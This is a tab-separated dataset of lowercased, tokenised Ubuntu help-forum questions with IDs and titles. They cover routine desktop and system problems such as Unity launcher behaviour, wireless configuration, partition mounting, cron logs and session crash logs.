36297	how do i make abiword show it 's icon in unity launcher ?	i prefer abiword instead of libreoffice , so i right-clicked on an opendocument-file , selected `` open with '' and in the window i chose to make it open with the command `` abiword '' , and when i double-click the document it opens in abiword , but in the launcher it shows a gray question mark instead of the abiword icon . it 's a minor thing i know , but it bugs me . how can you start it and have the real icon show ?
36298	macbook trackpad very coarse	i recently installed ubuntu on my macbook . everything seems to be working just fine except the trackpad . the right click ( with 2 fingers ) works just fine but when i try to scroll the cursor it is very slow and not as smooth as on mac os x . do i need to update the drivers or is there some other option that i need to activate or change to get it to work the way i want it ?
36299	why do i get titles of oo document in gibberish	opening an openoffice file with hebrew name , the file name appears as gibberish . in the folder it is read fine , but when i open the file , on the top bar of the document window and in the bottom of the screen it appears as gibberish . it probably related to l18n l10n , but i do n't know were to start troubleshooting this . i use ubuntu 10.10 with openoffice 3.2
36300	error when sending signed mail in evolution	when i try to send a mail in evolution , i get the following error : could not create message . because `` peer 's certificate issuer has been marked as not trusted by the user . ( -8172 ) - can not add ms smimeenckeyprefs attribute '' , you may need to select different mail options
36303	wget schedule sending mail if response time > 5 secs	i 'm using a script called responser which sends email when any of the my sites are down/slow . i just wanted to check if it 's sending the mail only if the sites are really down or slow ( as i checked it accessing as soon i got the error mails and sites was fine ) . i thought of using wget as it shows the speed and response time and i want to schedule it to compare it with my responser script whether both sends the mail at the same time saying error . i 've postfix installed and i could send mails using mail command to any e-mail id from the terminal . i want the output of wget http : //www.mysite.com to be mailed with the condition if response time is greater than 5 seconds . then i can schedule it to run at every 5 mins . i saw many having good programming skills here and hope someone could help me . thanks !
36305	why unity 3d in natty doesnt have the same accordion effect we saw in unity in ubuntu 10.10 netbook edition	the accordion effect seen in unity in ubuntu 10.10 netbook edition is fantastic . when you hover the mouse on the icons folded in the bottom of the unity panel they expand while the icons on the top of the unity panel ( usually the home folder and firefox ) fold in a accordion effect and stay like this for as long as you want them to stay folded . you can see what i am talking about here in the new unity 3d in natty this is not implemented . only the icons at the bottom of the unity panel stay folded permanently ( because of the gravity force i guess : ) ) ) while the icons in the upper part never get folded . when u hover the mouse over them they expand but the icons of the upper part of the unity panel do n't fold in an accordion effect but they get out of site over the ubuntu logo in the upper panel . that was a fantastic feature of unity une 10.10 that is not implemented in unity in natty and i want to ask why ? and something else . take a look at the unity icons on une 10.10 at the link provided . they look fantastic , colorful , sexy . the current icons in the natty 's unity are simply super ugly and i still do n't know why . update ! ! ! this is what i was looking 4 in the natty 's unity . it is made by ubuntu and u can make it again work the same way in the other releases of unity i guess : ) ) . the second video in this link . isnt that great ? ? ? ?
36306	option for enabling wireless network missing	i have ubuntu 10.04 installed into my laptop . the option for enabling wireless network in the network manager is missing . it comes only when i install my wireless driver ( broadcom sta ) when i will be able to use wireless . if i restart my computer after that , i am not able to use the wireless network since 'enable wireless network ' option is missing ( even though the wireless driver is installed ) . is there any way of getting that option everytime in my network manager ?
36310	how do i ssh into a user mode linux process	i have managed to startup a user mode linux session ( see how to correctly start a ubuntu user-mode-linux from the command line ) although i 'm still having an issue on startup i 'm able to get networking up and going using the following sequence . my issue is that i 'm still missing some step since although i can startup a ssh login session to the uml i 'm not able to get logged in . i have tried creating new users within the uml but i 'm not able to get past the prompt to login . on host : tunctl -u andrew -t tap1 ls -l /dev/net sudo ifconfig tap1 192.168.0.254 up ifconfig –a on uml : linux ubda=nattycow , ubuntu-natty-i386-root_fs mem=256m root=/dev/ubda init=/bin/bash umid=natty eth1=tuntap , tap1 , fe : f0:00:00:00:01,192.168.0.254 getty -8 -n -l /bin/sh 38400 tty2 & exec /sbin/init on terminal # 2 : ifconfig –a sudo ifconfig eth1 192.168.0.253 up ifconfig –a ping 192.168.0.254 service ssh start on host : ping 192.168.0.253
36316	find and manage multiple copies of the same file/directory	due to my father 's file mismanagement over the years , he has multiple copies of same files - worth hundreds of megabytes - copied into different directories resulting in a few gbs of hdd occupied needlessly . is there a software i can use to locate same directory and/or file and help in sorting them out ? in short , i need something that : finds copies of the same file and folders informs me of files/folders that have the same name even if their contents are not solutions not specific to a particular platform preferred , but not an important issue .
36318	unity launcher keyboard shortcuts for `` /media '' mounted drives ?	there are no letter/number designations for these drives . is there any way i can select them using the keyboard ?
36319	does lenovo fingerprint reader work in ubuntu ?	i 'd like to know if anyone out there has a lenovo laptop with the fingerprint reader . i was wondering if the reader works on ubuntu ?
36326	what is the hp_accel module , and what does it do ?	i was looking at what modules were loaded the other day on my laptop and i was wondering what the hp_accel module does . any ideas ?
36327	ftp access to one site is denied	i 'm filling up one site via ftp . all works fine . but in several days ftp refused to connect . filezilla 's printing connecting xxx.xxx.xxx.xxx ... .. connection time out ip of server is pinged well . i had 4 assumptions : something with ubuntu i 've opened virtualbox with win xp , installed filezilla there and had the same problem ( connection was by nat ) my ubuntu system somewhere blocks this ip address . last three days i spent in another city and there i could connect this ftp . ( with the same shortcut i created early - in ubuntu bookmarks and in filezilla ) hosting provider of site blocked me . i 've call to tech support of the site hosting - they sayd they have n't block anyone my provider at home blocked this site . i live in student hostel , and i 've tried to connect on my roommate 's pc - and it connects fine . why can this happen ? i ca n't understand . help please .
36328	using gparted to remove windows partition	i 'm currently dual-booting to either ubuntu 10.10 or windows xp . however , i rarely use windows and would like to remove it . i 've use the ubuntu live cd to access gparted . i 've also deleted the windows partitions ( i think ) , which were labeled both ntfs and fat32 . i 'm just not sure how to extend the ubuntu partition to cover the unallocated space . furthermore , how do i deal with the 'key ' designations , which state that a partition is busy . help !
36332	when i create a bootable usb device , does `` startup disk creator '' use all the space on the device ?	i want to put a bootable image of ubuntu on my usb device . i 'm following the directions on ubuntu.com . my usb device has 500gb or something . does it have to use all of the space ? or is there a way to only use 2 or 3gb ?
36341	how to get unity dash overlays maximized by default ?	in unity , if you open the applications dash or even if you just press the meta key to open the search dash , they always pop out with a default size of something looking 800x600ish . in the lower right hand of the dash is an icon which maximizes the overlay to the whole screen . is there a way to get these dash overlays to pop out maximized by default ?
36342	play 2 videos in sync on a loop in ubuntu	i have 2 videos i want to run synchronously besides each other . i 'm currently going to create 1 video file and span that over 2 monitors , but that requires some `` video hacking '' of getting everything in place correctly . is there an easier way to do it ? so , to clarify : 1 computer is used . 1 monitor is connected . 1 tv is connected ( composite out ) how do i get videofile 1 and videofile 2 to play in sync ?
36343	updates/installing problem	i have occasionally not been able to install/update and the computer complains about something running apt-get , but there is nothing running ( i have checked the system monitor to see whether or not there is anything like synaptic/aptitude running and there is nothing that it says is running . ) -- sam mercier
36344	does n't boot on hardware : hp 8200 elite	just bought a new pc . it has the specs that are shown in the picture : whatever i tried ( alternate cd-/roms , dvds , usb pendrive etc . ) , it just runs into a grub shell where it stops . for testing , i already tried opensuse . any idea what this could be ? any idea how to debug it ? i already tried different settings in the bios of which i know that they could make some trouble . without success ... ps : i 'm currently trying around again ... and i found out that gentoo 's install live-cd seems to boot . nothing special there . just strange that ubuntu , the `` it runs everywhere '' just does n't do anything . edit2 : finally i managed to install and boot an archlinux . though i 'd prefer ubuntu , if someone is interested in the answer , i can post what i 've found here . wo n't close yet . many thanks and regards !
36345	kruft : why do i gain 1gb each time i do a distribution upgrade	every 5 months i start running out of space on my root partition ... i scramble to erase documentation , remove log files , and keep only a single kernel so as to keep enough space . and then every time i run a distribution upgrade ( cdromupgrade ) i end up with about a gig more space even though it keeps all the same programs installed . anyone know where the kruft is ?
36352	why does my computer startup again when suspended ?	the whole point of suspending a computer is to make it cool off and be quiet . but my computer starts up just as it get 's quiet , it 's really annoying ! my computer is a asus 1201n and i 'm running 10.04 lts
36356	why ca n't i run update-manager-d to upgrade ?	i 'm semi-new and not an idiot with computers . i ca n't get update-manager-d to run and it says that their is no such thing . can anyone help me ?
36357	any programs to help tag/organize files ?	i would love a program to help tag and automatically sort files ... picture something a lot like a gmail inbox , where new and unsorted files remain in the inbox , and files can be searched , tagged , etc . i 'm actually considering starting a project like this , but on the long shot something like it exists , i figure i might as well save the time . is there anything like this , either as a nautilus extension or a standalone program ? edit i just upgraded to 11.04 , and it looks like something is in the works with this ... if i right-click a file , the context menu has a `` tags ... '' option which lets me tag files ( this is also available in file properties via a `` tags '' tab ) . a handful of my files appear to be automatically tagged , even . ... or did this happen when i installed tracker ? the only problem is , i ca n't find any way to make use of the tags . is there a way to search them ? using the unity search bar does n't appear to do the job ( yet ) .
36361	what would be the easiest way to host an intranet mono web application ?	i 've just finished migrating a lightweight microsoftâž .netâ˘ web application to mono and now i 'm looking for a straight-forward way to host such development on a ( perhaps virtualized ) ubuntu server within an intranet environment . i was wondering if you guys have any advice to share as i 'm not quite experienced when it comes to server-side/operations stuff . thanks much in advance ! update posted at serverfault as suggested : http : //serverfault.com/questions/263649/what-would-be-the-easiest-way-to-host-an-intranet-mono-web-application
36363	gwibber does not respect proxy settings	is there any way to make gwibber respect the system proxy settings ? right now , if i try setting up a facebook account from the `` broadcast accounts ... '' option , it comes back with an `` unable to load page '' error .
36364	what are the needed locales for dialog scripts to display correctly ?	i 'm writing some custom installers that will work on ubuntu and i 'm using the dialog utility to help simplify the process of getting user input . sometimes , i notice that the extended ascii that dialog outputs ( such as line frames around text boxes ) is not displayed correctly . ( you get the circle with a question mark in it ) . this seems to happen when a system has been provisioned using the pxe/netboot installer . i 'm wondering , given that the only language i need to support is english , what locale i should check for and suggest installing prior to launching dialog ? i 've noticed this across multiple releases , my question is n't specific to a certain release .
36370	is it possible to set an arbitrary size for the dash in unity ?	what i mean is , can i set a size that more fits my liking ? like say , 50 % of the screen , 25 % , etc ?
36371	why does n't compiz show the outline when i use the grid ?	when i drag windows , instead of getting an outline like i would on a clean install , i get nothing , so i do n't know what function the plugin will use before releasing the mouse , other than what i guess it will do . is there something known to cause this to happen , and what can i do to get back the outline ? ( nb : i have the outline enabled in the plugin settings , so please do not ask me to enable it : d ( lol ) ! ) edit : now i have reinstalled the compiz plugins cleanly and still noting : ( . what can i do ?
36374	changing wireless network settings by editing files - is this possible ?	so i have a dilemma where my girlfriend wants to use her ds on my wireless network when she 's over , but the thing is old and only supports wep . my network is normally wpa2 - something i 'm not really comfortable with changing , for obvious reasons . as an interim solution , i 've been logging into my router , switching the settings so she could play , and then switching them back when she was done . this has gotten old pretty fast , because every time i do it i have to : login into the router 's administrative interface change the settings to wep and then reboot the device , which disconnects my laptop from the internet . edit the wireless settings for my network connection on my laptop reconnect . then i have to repeat this process when i want to go back to wpa . obviously , this is entirely too much work . so i decided to script it . to handle the router 's settings , i wrote two selenium tests - one to login to the router and switch to wep , the other to switch back to wpa . these are tested and work - and can be called from the command line via selenium rc . the problem i 'm having is the wifi settings . i need to stop the automatic attempt at reconnection ( since the saved settings will not work after the router gets switched ) , change the authentication type from wpa to wep ( or back again ) , change the password to the appropriate one and then finally reconnect . sorry this has been so long winded - just trying to explain the situation to see if anyone has any alternatives to my method and also hope my desire for laziness garners some sympathy . in brief - does anyone know how i can control my wifi settings and connections via the command line ? i 'm using ubuntu 10.10 with gnome . thanks !
36376	how do i clear the list of recent files in unity files and folders lens ?	how do i clear the list of recent files in unity files and folders lens ? ?
36377	ca n't change keyboard layout selection	i was given an ubuntu 10.10 machine with the following weird thing : it has several 'us ' keyboard layouts in list ( and hotkey cycling ) . when i open system - preferences - keyboard and try to fix , i can delete extra layouts , but : gtk skin on all windows changes to something default and ugly . after relogin , everything is back . i have tried applying changes system-wide and from root , changing keyboard input method . i have checked file access rights on my home folder are ok. any ideas ?
36378	app for syncing between ubuntu and a very restricted win7 ?	i have a school issued laptop running windows 7 on which i can not install anything or run .exe . apart from just using a usb , any recommendations for syncing text files or am i dreaming ?
36382	mouse bindings in gnome 3	i 'm interested in trying out gnome shell ( which i like better than unity ) , but i 'm wondering if it 's possible to bind the scrollwheel button on my mouse to the activities menu , as i do not like having to move my mouse to the top left-hand corner . in compiz i currently have my scrollwheel button bound to the scale function , and i 'd like to duplicate that functionality .
36385	how to show .trash and hidden files on usb sticks but not in $ home ?	in my home directory , there is a lot of files beginning with a dot , and i like the fact that nautilus hides them . but when nautilus hides .trash on a usb disk , i risk leaking confidential documents inadvertently , wrongly thinking that i deleted all files from the usb stick i give to an acquaintance . so , how to set nautilus to : hide these files in my home but show them for usb sticks ? another solution could be to disable trash for usb sticks , but the idea is not implemented yet . any alternative solution welcome . i am looking for a permanent solution , so hitting ctrl+h each time is not a solution .
36387	`` special device does not exist ''	i have 3 hard drives in my machine . two of them are 1tb drives with my old home partition on a software raid1 . i installed an ssd as a 3rd drive with a fresh ubuntu 10.10 currently running . i now try to mount my old home partition , which gives me an error : $ mount -t reiserfs /dev/sda5 /mnt/oldhome mount : special device /dev/sda5 does not exist fdisk shows me that all partitions are there . /dev has sda and sdb in it , but not the partitions on them . any ideas ? edit : blkid shows me the following : /dev/sda : type= '' isw_raid_member '' /dev/sdb : type= '' isw_raid_member '' /dev/mapper/isw_eahifbiigj_datadump1 : uuid= '' 247dbff9-236f-4fa7-a0d4-1f060d973a3e '' type= '' reiserfs '' /dev/sdc1 : uuid= '' 6ba699d7-caaa-4a87-9deb-e7aca73984de '' type= '' ext4 '' i can mount the third one , which contains some orphaned partition , living on sda1 .
36388	where is my cronlog ?	while trying to google this a lot of sources claims there 's a cron log in /var/log but i have none . i 'm fairly convinced cron has run and i know it is running because of : service cron status cron start/running , process 19574 is there some setting i need to set ?
36390	~ no longer takes me to my home directory	i 'm a newcomer to ubuntu ( and linux in general ) and since i have a machine spare , i have ubuntu server ( terminal only ) installed on one of my machines . i 've recently started playing around with my dotfiles , however it seems i 've messed something up as changing directory to '~ ' no longer presents me with the expected user 's home directory ! the .bashrc file that 's in my dotfiles directory then points to a `` .env '' file at ~/bin/dotfiles/.env which contains the following : export editor= '' nano '' export path= $ path : ~/bin export home= '' /home/joe/ '' export dotfiles= '' /home/joe/bin/dotfiles '' does anyone have any ideas to restore the tilde to my user 's home location ?
36399	ubuntu 11.04 randomly logs out in middle of use	i can see there is a question already.since my problem is not quite the same but quite similar as far as i understand , i am asking it too . basically in the middle of my usage i.e . browsing net or running a random application . ubuntu sends me to the login window and i have to re-login . i do not know if gdm restarts or something else . this is a problem that i face even in the stable release of ubuntu . is there a bug i do not know about ? ? how can i debug this ? here is my ~/.xsession_errors file output . /etc/gdm/xsession : beginning session setup ... setting im through im-switch for locale=en_us . start im through /etc/x11/xinit/xinput.d/all_all linked to /etc/x11/xinit/xinput.d/default . gnome_keyring_control=/tmp/keyring-cn4xlz ssh_auth_sock=/tmp/keyring-cn4xlz/ssh gnome_keyring_control=/tmp/keyring-cn4xlz ssh_auth_sock=/tmp/keyring-cn4xlz/ssh gnome_keyring_control=/tmp/keyring-cn4xlz ssh_auth_sock=/tmp/keyring-cn4xlz/ssh backend : gconf integration : true profile : unity adding plugins initializing core options ... done window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 initializing bailer options ... done initializing detection options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing move options ... done initializing imgsvg options ... done initializing expo options ... done initializing mousepoll options ... done initializing workarounds options ... done initializing resize options ... done initializing gnomecompat options ... done initializing ezoom options ... done initializing staticswitcher options ... done initializing obs options ... done initializing snap options ... done initializing scale options ... done initializing wall options ... done initializing imgjpeg options ... done initializing grid options ... done starting dropbox ... ** message : /home/sagar/.config/desktopnova/pidlock already exists , but process with pid 1911 is not desktopnova . daemon will continue starting . initializing place options ... done initializing commands options ... done i/o warning : failed to load external entity `` /home/sagar/.compiz/session/10d8191ee2e3827d13130355181434233600000157530036 '' initializing session options ... done ** ( process:15832 ) : warning ** : recent-manager-provider.vala:125 : desktop file for audacious2 was not found ( synapse:15840 ) : gtkhotkey-debug : listener type : gtkhotkeyx11listener ** ( nm-applet:15829 ) : debug : old state indicates that this was not a disconnect 0 initializing nautilus-dropbox 0.6.7 initializing nautilus-gdu extension done ! ** ( < unknown > :15822 ) : debug : unity accessibility initialization ** ( < unknown > :15822 ) : debug : shows on edge : 1 screen geometry changed : monitor 0 ( primary ) 0x0x1366x768 unity-panel-service : no process found ** ( < unknown > :15822 ) : debug : panelcontroller : : added panel for monitor 0 initializing unityshell options ... done initializing unitymtgrabhandles options ... done starting unity-window-decorator ** ( < unknown > :15822 ) : debug : placeentry : applications ** ( < unknown > :15822 ) : debug : placeentry : commands ** ( < unknown > :15822 ) : debug : placeentry : files & folders ** ( < unknown > :15822 ) : debug : /com/canonical/unity/applicationsplace ** ( < unknown > :15822 ) : debug : /com/canonical/unity/filesplace ** ( < unknown > :15822 ) : debug : setting to primary screen rect : x=0 y=0 w=1366 h=768 ** ( < unknown > :15822 ) : debug : acquired the name com.canonical.unity.launcher on the session bus ** ( < unknown > :15822 ) : debug : traychild rejected : dropbox-client-15846 dropbox dropbox ** ( < unknown > :15822 ) : debug : traychild rejected : synapse synapse synapse ** ( < unknown > :15822 ) : debug : traychild rejected : nm-applet nm-applet nm-applet ** ( < unknown > :15822 ) : debug : traychild accepted : gnote gnote gnote ** ( < unknown > :15822 ) : debug : traychild rejected : gst-keyboard-xkb gnome-settings-daemon gnome-settings-daemon ( gnote:15839 ) : gdk-critical ** : ia__gdk_window_thaw_toplevel_updates_libgtk_only : assertion `private- > update_and_descendants_freeze_count > 0 ' failed ** ( < unknown > :15822 ) : debug : traychild rejected : battery-indicator battery-status battery-status ** ( < unknown > :15822 ) : debug : indicatoradded : libapplication.so ** ( < unknown > :15822 ) : debug : indicatoradded : libsoundmenu.so ** ( < unknown > :15822 ) : debug : indicatoradded : libmessaging.so ** ( < unknown > :15822 ) : debug : indicatoradded : libdatetime.so ** ( < unknown > :15822 ) : debug : indicatoradded : libsession.so setting update `` run_key '' setting update `` run_command_terminal_key '' setting update `` initiate_output_edge '' setting update `` launcher_hide_mode '' setting update `` panel_opacity '' setting update `` icon_size '' ** ( gnome-screensaver:16128 ) : warning ** : screensaver already running in this session ( < unknown > :15822 ) : glib-gobject-warning ** : instance of invalid non-instantiatable type ` ( null ) ' ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ** ( process:15832 ) : debug : zeitgeist-datahub.vala:174 : inserting 1 events ( < unknown > :15822 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ( < unknown > :15822 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ** ( < unknown > :15822 ) : debug : maximizeifbigenough : window mapped and already maximized , just undecorate ** ( < unknown > :15822 ) : debug : maximizeifbigenough : guake.py window size does n't fit ** ( < unknown > :15822 ) : warning ** : unable to fetch children : method `` children '' with signature `` '' on interface `` org.ayatana.bamf.view '' does n't exist ( < unknown > :15822 ) : glib-gobject-warning ** : instance of invalid non-instantiatable type ` ( null ) ' ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ( < unknown > :15822 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ( < unknown > :15822 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ** ( process:15832 ) : debug : zeitgeist-datahub.vala:174 : inserting 1 events loaded md5.js ( < unknown > :15822 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ( < unknown > :15822 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ** ( < unknown > :15822 ) : debug : maximizeifbigenough : window mapped and already maximized , just undecorate ( firefox-bin:18524 ) : libdbusmenu-gtk-critical ** : dbusmenu_menuitem_property_set_shortcut : assertion `gtk_accelerator_valid ( key , modifier ) ' failed ** ( < unknown > :15822 ) : debug : maximizeifbigenough : guake.py window size does n't fit ( < unknown > :15822 ) : glib-gobject-warning ** : instance of invalid non-instantiatable type ` ( null ) ' ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ( < unknown > :15822 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ( < unknown > :15822 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ** ( < unknown > :15822 ) : debug : maximizeifbigenough : guake.py window size does n't fit ** ( process:15832 ) : debug : zeitgeist-datahub.vala:174 : inserting 1 events 15846 ? 00:00:01 dropbox 22490 ? 00:00:00 unity-dropbox-s /usr/bin/unity-dropbox-share : line 28 : return : can only `return ' from a function or sourced script error setting attribute : error setting file metadata : no such file or directory ** ( < unknown > :15822 ) : debug : connected to proxy ( < unknown > :15822 ) : dee-warning ** : transaction from com.canonical.unity.filesplace.sectionsmodel is in the past . ignoring transaction . ( < unknown > :15822 ) : dee-warning ** : transaction from com.canonical.unity.filesplace.groupsmodel is in the past . ignoring transaction . ( < unknown > :15822 ) : dee-warning ** : transaction from com.canonical.unity.filesplace.globalgroupsmodel is in the past . ignoring transaction . ** ( < unknown > :15822 ) : debug : connected to proxy ** ( < unknown > :15822 ) : debug : connected to proxy ( < unknown > :15822 ) : glib-gio-critical ** : g_bus_own_name : assertion `g_dbus_is_name ( name ) & & ! g_dbus_is_unique_name ( name ) ' failed ( < unknown > :15822 ) : glib-gio-critical ** : g_bus_watch_name : assertion `g_dbus_is_name ( name ) ' failed ( < unknown > :15822 ) : glib-gio-critical ** : g_bus_own_name : assertion `g_dbus_is_name ( name ) & & ! g_dbus_is_unique_name ( name ) ' failed ( < unknown > :15822 ) : glib-gio-critical ** : g_bus_watch_name : assertion `g_dbus_is_name ( name ) ' failed ( < unknown > :15822 ) : glib-gio-critical ** : g_dbus_connection_register_object : assertion `object_path ! = null & & g_variant_is_object_path ( object_path ) ' failed ( < unknown > :15822 ) : glib-gio-critical ** : g_dbus_connection_register_object : assertion `object_path ! = null & & g_variant_is_object_path ( object_path ) ' failed ( < unknown > :15822 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ( < unknown > :15822 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( < unknown > :15822 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed ** ( < unknown > :15822 ) : debug : maximizeifbigenough : nautilus window size does n't fit ** ( nautilus:15824 ) : warning ** : invalid borders specified for theme pixmap : /home/sagar/.themes/nautilus/null.png , borders do n't fit within the image ** ( nautilus:15824 ) : warning ** : invalid source position for bilinear gradient ** ( nautilus:15824 ) : warning ** : invalid source position for vertical gradient ** ( nautilus:15824 ) : warning ** : invalid source position for horizontal gradient ** ( nautilus:15824 ) : warning ** : invalid borders specified for theme pixmap : /home/sagar/.themes/nautilus/null.png , borders do n't fit within the image ** ( nautilus:15824 ) : warning ** : invalid source position for bilinear gradient ** ( nautilus:15824 ) : warning ** : invalid source position for vertical gradient ** ( nautilus:15824 ) : warning ** : invalid source position for horizontal gradient ** ( < unknown > :15822 ) : debug : maximizeifbigenough : guake.py window size does n't fit nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . ** ( nautilus:15824 ) : warning ** : invalid source position for bilinear gradient ** ( nautilus:15824 ) : warning ** : invalid source position for vertical gradient ** ( nautilus:15824 ) : warning ** : invalid source position for horizontal gradient ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:15824 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed i recently got an update to gnome-sessions . i hope that solves the problem , however i can only be sure after testing for few days ... will update the situation . update : nope no progress , got the update but the problem persists . but it seems to be a lot less frequent than it used to be . i am following up this question as some people suggested me to re-install but now i face unity freezes after compiz configuration change
36401	modify manually pwm of my fan ( fan speed )	i configured fanspeed but it detects only one `` temp '' captor ... in gnome sensors applet , i can see the temperature of three captors ... the one of my gpu is 75째 , 62째 for my hard disk and 32째 for my motherboard ... i would like to increase the speed of the fans , just with a command in the terminal ... it is possible ? i know that there is a material solution ( buttons on the computer to increase / decrease fans speed ) , but i 'd like to do it with the terminal = ) thank you !
36402	best ide to write c++ programs	hi , i 'm going to write c++ program with a frameworks that uses opengl , opencv , etc . i 've tried eclipse but even it is a great tool for java and python c++ plugins with makefile projects has some problems . what is the besto tool for writing c++ ? ( code completition , autogeneration , code navigation etc )
36405	error when starting bitcoin	i just installed bitcoin and everything seemed to be going well . after a few days the client stopped loading at boot and instead gave this error : db_runrecovery : fatal error , run database recovery bitcoin in cmyapp : :onunhandledexception ( ) anyone know how i can run the db recovery or other ways to rectify the error ?
36410	unity 2d documentation ?	is there any documentation for unity 2d ? the only settings available seem to be buried in gconf and are a bit cryptic .
36411	adding a python script to application launcher	i 'm using gnome 2.32.0 in ubuntu 10.10 and i need to execute a python script via gnome custom application launcher . i added an application launcher to the panel and pointed the relevant python script , but every time i try to run it , i get an error message along these lines : there was an error creating the child process for this terminal failed to execute child process `` /home/dananjaya/xkcd_viewer/xkcd_gui.py '' ( permission denied ) what is the correct way of adding a python script to the application launcher ? what is wrong in this case ? thank you in advance .
36423	how to enable overlay scrollbars in my app ?	i 'm testing my app in natty 2nd beta , in which most applications are showing the new overlay scroolbars , i guess only non-native gtk apps ca n't show it ( like libreoffice or firefox ) . my app is coded using python and pygtk so i thought the overlay scrollbars should be enabled by default but i was wrong . i tried to set the environment variable liboverlay_scrollbar to 1 in both terminal ( previously to the app command ) and inside the python code via os.putenv ( ) , but it 's still showing the old-fashioned scrollbars . what am i doing wrong ?
36427	how do i disable munin ?	my laptop ( ubuntu 10.10 ) takes a really long time to start up . watching top , one of the things it seems to be spending a lot of time on is munin . i 'm trying to sort out what might depend on it and/or how to disable it most of the time .
36431	network icon shows an internet connection , while ping does not	i am an ubuntu user for the last couple of years . recently facing problem to connect my new laptop into the internet . i have an isp connection which provide me a nat address . i changed all the information in network configuration.the network icon shows it is connected to internet but when i browse , ping shows no internet connection . /etc/network/interfaces look like this : auto eth0 iface eth0 inet static address 192.168.100.118 ( put you internet address provided by the isp ) gateway 192.168.100.1 ( gateway address ) netmask 255.255.255.0 network 192.168.100.0 and when i ping my dns server ip get the reply from dns server . i can not understand the problem , it should be mentioned that i also changed the physical address of my laptop for using the existing connection . in windows the connection is working fine . any suggestion in this question will help me a lot . thanks in advance .
36432	can i throttle liferea ?	after i log in , my laptop takes a really long time to load . watching top , it seems like one thing that is using a ton of juice is liferea . i do want it to sync my feeds , but i 'm wondering if there 's a good way to throttle it so that it does n't use more memory than i have to spare .
